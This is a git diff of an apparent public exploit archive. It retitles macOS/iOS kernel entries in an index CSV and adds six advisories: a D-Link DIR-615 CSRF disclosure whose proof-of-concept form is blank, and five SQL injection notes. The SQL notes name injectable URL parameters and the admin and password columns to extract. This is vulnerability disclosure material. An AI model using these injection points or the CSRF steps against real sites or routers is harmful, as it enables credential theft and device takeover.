diff --git a/files.csv b/files.csv index a7b985b1a..74dc93179 100644 --- a/files.csv +++ b/files.csv @@ -203,7 +203,7 @@ id,file,description,date,author,platform,type,port 1129,platforms/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,windows,dos,0 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,windows,dos,0 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0 -41796,platforms/multiple/dos/41796.c,"macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos,0 +41796,platforms/multiple/dos/41796.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos,0 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0 @@ -1910,9 +1910,9 @@ id,file,description,date,author,platform,type,port 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)",2010-08-30,Metasploit,windows,dos,0 -41793,platforms/multiple/dos/41793.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos,0 +41793,platforms/multiple/dos/41793.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos,0 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos,0 -41798,platforms/macos/dos/41798.c,"macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos,0 +41798,platforms/macos/dos/41798.c,"Apple macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos,0 16790,platforms/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,aix,dos,0 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0 @@ -5335,8 +5335,8 @@ id,file,description,date,author,platform,type,port 40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 - MSHTML CSpliceTreeEngine::RemoveSplice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0 40947,platforms/windows/dos/40947.html,"Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)",2016-12-21,"Google Security Research",windows,dos,0 40948,platforms/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",windows,dos,0 -40952,platforms/macos/dos/40952.c,"macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",macos,dos,0 -40954,platforms/macos/dos/40954.c,"macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",macos,dos,0 +40952,platforms/macos/dos/40952.c,"Apple macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",macos,dos,0 +40954,platforms/macos/dos/40954.c,"Apple macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",macos,dos,0 40955,platforms/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0 40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0 40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0 @@ -5433,13 +5433,13 @@ id,file,description,date,author,platform,type,port 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 -41791,platforms/macos/dos/41791.c,"macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos,0 -41792,platforms/multiple/dos/41792.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0 -41797,platforms/macos/dos/41797.c,"macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0 -41794,platforms/multiple/dos/41794.c,"macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 +41791,platforms/macos/dos/41791.c,"Apple macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos,0 +41792,platforms/multiple/dos/41792.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0 +41797,platforms/macos/dos/41797.c,"Apple macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0 +41794,platforms/multiple/dos/41794.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0 -41790,platforms/macos/dos/41790.c,"macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0 +41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0 @@ -6805,7 +6805,7 @@ id,file,description,date,author,platform,type,port 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0 -41804,platforms/multiple/local/41804.c,"macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local,0 +41804,platforms/multiple/local/41804.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local,0 40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0 16503,platforms/windows/local/16503.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0 @@ -8858,7 +8858,7 @@ id,file,description,date,author,platform,type,port 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0 -40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0 +40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0 @@ -15393,7 +15393,7 @@ id,file,description,date,author,platform,type,port 41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0 -41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0 +41443,platforms/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0 41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0 41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0 @@ -37688,3 +37688,9 @@ id,file,description,date,author,platform,type,port 41774,platforms/php/webapps/41774.py,"EyesOfNetwork (EON) 5.1 - SQL Injection",2017-03-29,"Dany Bach",php,webapps,0 41779,platforms/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,multiple,webapps,0 41780,platforms/php/webapps/41780.txt,"Membership Formula - 'order' Parameter SQL Injection",2017-03-31,"Ihsan Sencan",php,webapps,0 +41816,platforms/php/webapps/41816.txt,"ImagePro Lazygirls Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 +41817,platforms/php/webapps/41817.txt,"Airbnb Crashpadder Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 +41818,platforms/php/webapps/41818.txt,"Premium Penny Auction Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 +41819,platforms/php/webapps/41819.txt,"Sweepstakes Pro Software - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 +41820,platforms/php/webapps/41820.txt,"Appointment Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 +41821,platforms/hardware/webapps/41821.txt,"D-Link DIR-615 - Cross-Site Request Forgery",2017-04-05,"Pratik S. Shah",hardware,webapps,0 diff --git a/platforms/hardware/webapps/41821.txt b/platforms/hardware/webapps/41821.txt new file mode 100755 index 000000000..47806c4a4 --- /dev/null +++ b/platforms/hardware/webapps/41821.txt @@ -0,0 +1,160 @@ +Title: +==== + +D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability + + + +Credit: +====== + +Name: Pratik S. Shah + + + +Reference: +========= + +CVE Details: CVE-2017-7398. + + + +Date: +==== + +1-04-2017 + + + +Vendor: +====== + +D-Link wireless router + + + +Product: +======= + +DIR-615 + + +http://www.dlink.co.in/products/?pid=678 + + +Affected Version: +============= + +Hardware: T1 , Firmware: 20.09 + + + +Abstract: +======= + +This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated. + + + +Attack Type: +=================== + +Remote + + + +Details: +========= + +CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to perform unwanted actions on router, which may lead to gaining full control of the device. + + + +Proof Of Concept: +================ + +1) User login to D-link DIR 615 wireless router + +2) User visits the attacker's malicious web page (DlinkCSRF.html) + +3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security Options to None + + + +This is the CSRF POC for changing the Security option from WPA2 to None( Parameter: Method) + +Attacker can also tamper following parameters + + hiddenSSID + SSID + Passwords for all the applicable security options + + + + + + + + + +
+ + + + + + + + + +Disclosure Timeline: +====================================== +Vendor Notification: 6th March 2017 + + diff --git a/platforms/php/webapps/41816.txt b/platforms/php/webapps/41816.txt new file mode 100755 index 000000000..9b77319a7 --- /dev/null +++ b/platforms/php/webapps/41816.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: ImagePro Lazygirls Clone Script - SQL Injection +# Google Dork: N/A +# Date: 05.04.2017 +# Vendor Homepage: http://bimedia.info/ +# Software: http://bimedia.info/8-2/ +# Demo: http://imagepro.clonedemo.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?page=31&imageID=[SQL] +# http://localhost/[PATH]/index.php?page=53&pg_id=[SQL] +# tc_membergroups:id +# tc_membergroups:group_name +# tc_membergroups:admin +# tc_members:id +# tc_members:group_id +# tc_members:username +# tc_members:password +# tc_members:email +# tc_members:join_date +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41817.txt b/platforms/php/webapps/41817.txt new file mode 100755 index 000000000..19afad4ee --- /dev/null +++ b/platforms/php/webapps/41817.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Airbnb Crashpadder Clone Script - SQL Injection +# Google Dork: N/A +# Date: 05.04.2017 +# Vendor Homepage: http://bimedia.info/ +# Software: http://bimedia.info/airbnb-premium-clone-script/ +# Demo: http://airbnb.clonedemo.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/page/1[SQL] +# http://localhost/[PATH]/view-rental/1/1[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41818.txt b/platforms/php/webapps/41818.txt new file mode 100755 index 000000000..3cce81745 --- /dev/null +++ b/platforms/php/webapps/41818.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Premium Penny Auction Script - SQL Injection +# Google Dork: N/A +# Date: 05.04.2017 +# Vendor Homepage: http://bimedia.info/ +# Software: http://bimedia.info/premium-penny-auction-script/ +# Demo: http://pennyauction.clonedemo.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/allauctions.php?aid=[SQL] +# http://localhost/[PATH]/news.php?nid=[SQL] +# http://localhost/[PATH]/productdetails.php?aid=[SQL]&pid=[SQL] +# admin :id +# admin :username +# admin :pass +# affiliate_transaction :aff_id +# affiliate_transaction :user_id +# affiliate_transaction :referer_id +# affiliate_transaction :amount +# affiliate_transaction :commission +# affiliate_transaction :bid_pack_title +# # # # # diff --git a/platforms/php/webapps/41819.txt b/platforms/php/webapps/41819.txt new file mode 100755 index 000000000..6f64c0a5a --- /dev/null +++ b/platforms/php/webapps/41819.txt @@ -0,0 +1,25 @@ +# # # # # +# Exploit Title: Sweepstakes Pro Software - SQL Injection +# Google Dork: N/A +# Date: 05.04.2017 +# Vendor Homepage: http://bimedia.info/ +# Software: http://bimedia.info/sweepstakes-pro-software/ +# Demo: http://mysweepstakespro.com/demo/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/win.php?s=[SQL] +# http://localhost/[PATH]/widget_lb.php?s=[SQL] +# ss_members :id +# ss_members :name +# ss_members :email +# ss_members :country +# ss_members :their_username +# ss_members :their_password +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41820.txt b/platforms/php/webapps/41820.txt new file mode 100755 index 000000000..7abdd54b1 --- /dev/null +++ b/platforms/php/webapps/41820.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Doctors Appointment Script - SQL Injection +# Google Dork: N/A +# Date: 05.04.2017 +# Vendor Homepage: http://appointment-script.com/ +# Software: http://appointment-script.com/demo +# Demo: http://appointment-script.com/demo +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/search?lat=[SQL]&lon=[SQL]&category=[SQL]&insurance=[SQL] +# user +# id +# first_name +# last_name +# username +# email +# password +# user_level_id +# Doctor profile images file upload vulnerability available. +# http://localhost/[PATH]/images/doctor_image/... +# # # # # \ No newline at end of file